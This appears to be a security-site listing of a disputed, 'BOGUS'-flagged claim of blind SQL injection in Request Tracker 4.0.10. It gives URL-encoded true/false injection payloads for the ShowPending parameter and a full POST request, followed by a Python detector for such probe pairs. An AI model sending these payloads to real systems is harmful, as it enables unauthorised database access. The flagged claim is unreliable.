WARNING! Fake news / Disputed / BOGUS

RT: Request Tracker 4.0.10 SQL Injection

2013-04-11 / 2013-12-23
Credit: cheki
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux
############################################

URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection

# Description:
Blind SQL Injection: append Boolean True/False string expressions, using apostrophes and commenting out the rest of the query.

# The following changes were applied to the original request:
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'

POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
###############################################

Reasoning:
The test result seems to indicate a vulnerability because it shows that values can be appended to parameter values, indicating that they were embedded in an SQL query.
In this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the next to last is different. Any others are for control purposes. A comparison of the last two responses with the first (the last is similar to it, and the next to last is different) indicates that the application is vulnerable.

Home Page: securitylabnews.blogspot.com
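Whether or not the reported injection is genuine (the page is flagged as disputed), the three-request true/false probe sequence listed above is a pattern worth recognising on the defensive side. The following Python is an added example, not part of the original advisory: it URL-decodes constructed POST bodies modelled on the listed ShowPending values, labels each value as a tautology or contradiction, and reports any parameter that received both, which is the signature of a boolean-blind probe run.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies modelled on the probe values in the advisory;
# the first body is the unmodified baseline request.
SAMPLE_BODIES = [
    "ShowPending=1&ShowResolved=1&ShowRejected=1&ShowDependent=1",
    "ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1",
    "ShowPending=1%27+and+%27b%27%3D%27f%27%29+--&ShowResolved=1&ShowRejected=1",
    "ShowPending=1%27+or+%27b%27%3D%27f%27%29+--&ShowResolved=1&ShowRejected=1",
]

# After decoding, a probe value looks like: 1' and 'f'='f') --
# quote, AND/OR, one quoted string compared to another, optional ')', SQL line comment.
PROBE_RE = re.compile(r"'\s*(and|or)\s*'(\w*)'\s*=\s*'(\w*)'\s*\)?\s*--", re.IGNORECASE)


def classify_probe(value):
    """Return 'and-true', 'and-false', 'or-true' or 'or-false'; None if not probe-shaped."""
    m = PROBE_RE.search(value)
    if not m:
        return None
    op, lhs, rhs = m.group(1).lower(), m.group(2), m.group(3)
    truth = "true" if lhs == rhs else "false"  # 'f'='f' is a tautology, 'b'='f' is not
    return f"{op}-{truth}"


def scan_body(body):
    """Decode one form body and list (parameter, label) for every probe-shaped value."""
    findings = []
    # parse_qs already turns '+' into a space and %27 into an apostrophe
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            label = classify_probe(value)
            if label:
                findings.append((name, label))
    return findings


def boolean_probe_targets(bodies):
    """Parameters that received both a true and a false comparison across the request set.
    A single tautology can be noise; the true/false pair on one parameter is the
    response-comparison technique the advisory's Reasoning section describes."""
    truths_seen = {}
    for body in bodies:
        for name, label in scan_body(body):
            truths_seen.setdefault(name, set()).add(label.split("-")[1])
    return sorted(n for n, t in truths_seen.items() if {"true", "false"} <= t)
```

Feeding decoded form bodies from a web server or WAF log through `boolean_probe_targets` surfaces the parameter being probed without having to inspect each request by hand.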

References:

http://bestpractical.com/rt/


Copyright 2017, cxsecurity.com